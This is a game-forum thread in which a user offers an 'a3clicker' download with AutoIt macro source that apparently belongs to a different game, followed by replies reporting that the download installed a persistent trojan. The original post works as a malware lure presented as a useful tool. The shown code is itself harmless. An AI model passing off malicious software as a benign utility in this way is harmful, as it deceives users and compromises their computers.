a3clicker v 3.1.9 new with GUI

No Non-Game related topics here.
Post Reply
anjan88
Memora
Memora
Posts: 3
Joined: Tue Jun 29, 2010 10:59 am

a3clicker v 3.1.9 new with GUI

Post by anjan88 »

Hey guys i couldn't find out the link of a3 clicker uploaded by GM Scar, so iam uploading the new a3clicker v 3.1.9 new with GUI

DOWNLOAD : http://www.4shared.com/file/Q2Lk-g1Q/a3 ... v_319.html

Here is the GUI
[spoiler=]#Region ;**** Directives created by a3clicker v 3.1.9.exe_GUI ****
#a3clicker v 3.1.9_icon=C:\hbey.ico
#a3clicker v 3.1.9_outfile=everybodyedit2.exe
#a3clicker v 3.1.9_Compression=3
#a3clicker v 3.1.9_Res_Comment=wut
#a3clicker v 3.1.9_Res_Fileversion=1.0.0.0
#a3clicker v 3.1.9_Res_LegalCopyright=wut
#EndRegion ;**** Directives created by a3clicker v 3.1.9_GUI ****

#include <GUIConstantsEx.au3>
#include <WindowsConstants.au3>
#include <ButtonConstants.au3>
#Include <GuiStatusBar.au3>
#include <IE.au3>
#include <Misc.au3>
#Include <File.au3>


;Options
Opt("MouseCoordMode", 2)
Opt("WinTitleMatchMode", 4)
Opt("TrayMenuMode",1)
Opt("MouseClickDelay", 9)
Opt("MouseClickDownDelay", 9)

$dll = DllOpen("user32.dll")
filedelete("delete.log")
dircreate("recorded")

;Set variables
global $ho, $noh, $w, $h, $rec, $filez, $files

$exit = TrayCreateItem("Exit")
TraySetState()


_IEErrorHandlerRegister ()

$oIE = _IECreateEmbedded ()
$window = GUICreate("Everybody Edits", 639, 539,-1,-1,bitor($WS_VISIBLE,$WS_CLIPSIBLINGS,$WS_CLIPCHILDREN,$WS_BORDER,$WS_MINIMIZEBOX,$WS_MAXIMIZEBOX))
guisetbkcolor(0x242424)
$Ac = GUICtrlCreateObj($oIE, 0, 0, 640, 520)
GUICtrlSetBkColor($Ac,0x242424)
GUISetState()

;Navigate to the flash
_IENavigate ($oIE, "http://static.jesper.nu/games/action/ev ... -edits.swf")



While 1
$msg = GUIGetMsg()
$msg1 = TrayGetMsg()

if $msg = $GUI_EVENT_CLOSE or $msg1 = $exit then
ExitLoop
EndIf
if WinActive("Everybody Edits","") and $noh == 1 Then
$ho = mousegetpos()
mouseclick("left",$ho[0],$ho[1])
EndIf

if WinActive("Everybody Edits","") then

;If Insert is pressed, go + color. Till end.
if _IsPressed("2D", $dll) Then
$pos = mousegetpos()
if $w = 22 Then
mouseclick("left",439,496)
mousemove($pos[0],$pos[1],0)
$h = 1
$hh = 110 + $h
$w = 1
Else
$h += 15
$w += 1
$hh = 110 + $h
mouseclick("left",$hh,496)
mousemove($pos[0],$pos[1],0)
EndIf

While _IsPressed("2D", $dll)
Sleep(10)
WEnd
EndIf

;If End is pressed, get the colour Black
if _IsPressed("23", $dll) Then
$pos = mousegetpos()
mouseclick("left",440,496)
mousemove($pos[0],$pos[1],0)

While _IsPressed("23", $dll)
Sleep(10)
WEnd
EndIf

;If F2 is pressed, set the variable to 1.
if _IsPressed("71", $dll) Then
if $noh = 1 then
$noh = 0
Else
$noh = 1
$ho = mousegetpos()
EndIf

While _IsPressed("71", $dll)
Sleep(10)
WEnd
EndIf

;If mouse is pressed save the mouseclicks to delete.log
;If record is activated, record the mouseclicks.
if _IsPressed("01", $dll) Then
$pos = mousegetpos()
if $rec = 1 Then
filewrite(@scriptdir & "\recorded\record" & $filez & ".log",$pos[0] & " " & $pos[1] & @crlf)
EndIf
if $pos[1] < 487 then
filewrite("delete.log",$pos[0] & " " & $pos[1] & @crlf)
EndIf

While _IsPressed("01", $dll)
WEnd
EndIf

;If Delete key is pressed, Clear the recent painting.
if _IsPressed("2E", $dll) Then
$lines = _FileCountLines("delete.log")
mouseclick("left",135,496,1,0)
for $i = 1 to $lines
$post = stringsplit(filereadline("delete.log",$i)," ")
mousemove($post[1],$post[2],0)
mouseclick("left",$post[1],$post[2],1,2)
Next
filedelete("delete.log")

While _IsPressed("2E", $dll)
Sleep(10)
WEnd
EndIf

;If right CTRL is pressed, record or stop the recording.
if _IsPressed("A3", $dll) Then
if $rec = 1 Then
$rec = 0
winsettitle("Everybody Edits","","Everybody Edits - Recording Stopped. Press Home too create it.")
else
winsettitle("Everybody Edits","","Everybody Edits - Recording..")
$rec = 1
$Files = _FileListToArray(@scriptdir & "\recorded\", "record*.log", 1)

If not @Error Then
$filez = $files[0] + 1
Else
$filez = 1
EndIf
EndIf

While _IsPressed("A3", $dll)
Sleep(10)
WEnd
EndIf

; If Home is pressed, play the recent recording.
if _IsPressed("24", $dll) Then
$Files = _FileListToArray(@scriptdir & "\recorded\", "record*.log", 1)

If not @Error Then
$filez = $files[0]
Else
$filez = 1
EndIf
$lines = _FileCountLines(@scriptdir & "\recorded\record" & $filez & ".log")
for $i = 1 to $lines
$post = stringsplit(filereadline(@scriptdir & "\recorded\record" & $filez & ".log",$i)," ")
mousemove($post[1],$post[2],0)
mouseclick("left",$post[1],$post[2],1,8)
Next

While _IsPressed("24", $dll)
sleep(10)
WEnd
EndIf

EndIf
WEnd
GUIDelete()
Exit[/spoiler]

just made a rar compression of the GUI.
Hope you like my work.

Thank You,
A3 Mania player.
maximus
Ranias
Ranias
Posts: 2604
Joined: Tue Mar 03, 2009 10:50 pm
Location: United States Of Delhi

Re: a3clicker v 3.1.9 new with GUI

Post by maximus »

I thnk it is the same clicker as the previous one...neways thanks...since that link wasnt wrkin i gues... !
Image
IGN : Oblivion
KH : ƒerocious

IGC : Mage Redyan

\m/ \m/
Save Earth...Itz The Only Planet Wid Gurllzz !!
Zwarrior
Big Karterian
Big Karterian
Posts: 16
Joined: Fri May 14, 2010 1:14 pm

Re: a3clicker v 3.1.9 new with GUI

Post by Zwarrior »

yea i havin dis clicker
maximus
Ranias
Ranias
Posts: 2604
Joined: Tue Mar 03, 2009 10:50 pm
Location: United States Of Delhi

Re: a3clicker v 3.1.9 new with GUI

Post by maximus »

Errr...somethng is wrng with this file... after i downloaded it..the cliker starts to spam itself..like..even if i exit the program...it keeps on running..and coming again n again..spammin... i had to run a system restore to finally get rid of it :| !
Image
IGN : Oblivion
KH : ƒerocious

IGC : Mage Redyan

\m/ \m/
Save Earth...Itz The Only Planet Wid Gurllzz !!
akshat01
Torturer
Torturer
Posts: 86
Joined: Thu May 21, 2009 2:25 am
Location: Pune
Contact:

Re: a3clicker v 3.1.9 new with GUI

Post by akshat01 »

virus ... !!!! gm delete it .. its sm mutha fck in tamil nadu.. last tym i fell prey to this clicker it was deleted ..


it is a trojan which infects ur comp/// go for system restoration....or else u hav to format ur pc.. no antivirus detects it .. also u will find that the main installation file is missing ...
Swordzarc...
sachina
Olgoc
Olgoc
Posts: 46
Joined: Sun Dec 20, 2009 1:12 pm
Location: India,Maharashtra,Mumbai,Panvel
Contact:

Re: a3clicker v 3.1.9 new with GUI

Post by sachina »

Ohhh :(
I got saved as you all mention i am not downloading it
I am providing downlaod link which is uploaded by me on rapidshare
http://rapidshare.com/files/404437112/a ... r.exe.html
or download from here
A3 Auto Clicker3.1.zip
Image
IGN:-Image
IGC:-Mage
IGT:-Forever Temoz
Please click on Eggs :)
Image
Image
maximus
Ranias
Ranias
Posts: 2604
Joined: Tue Mar 03, 2009 10:50 pm
Location: United States Of Delhi

Re: a3clicker v 3.1.9 new with GUI

Post by maximus »

Dude..i immediately went for restore.. dis kinda shit .... sad :| !
Image
IGN : Oblivion
KH : ƒerocious

IGC : Mage Redyan

\m/ \m/
Save Earth...Itz The Only Planet Wid Gurllzz !!
rituel
Ranias
Ranias
Posts: 711
Joined: Sun Oct 26, 2008 8:36 pm

Re: a3clicker v 3.1.9 new with GUI

Post by rituel »

this guy anjan has to been posting viruses dat hack ur computer frm d beginning i highly suggest ppl nt to use anything he uploading nomatter hw appealing dey seem to u..
Image
akshat01
Torturer
Torturer
Posts: 86
Joined: Thu May 21, 2009 2:25 am
Location: Pune
Contact:

Re: a3clicker v 3.1.9 new with GUI

Post by akshat01 »

he made up a account named zoozoo before.. told the gms.. nd topic was deleted
Swordzarc...
maximus
Ranias
Ranias
Posts: 2604
Joined: Tue Mar 03, 2009 10:50 pm
Location: United States Of Delhi

Re: a3clicker v 3.1.9 new with GUI

Post by maximus »

oh okok ..srry man didnt know..just tried this out and it was like fkin spammin my comp... then i immediately restored >,< !
Image
IGN : Oblivion
KH : ƒerocious

IGC : Mage Redyan

\m/ \m/
Save Earth...Itz The Only Planet Wid Gurllzz !!
Post Reply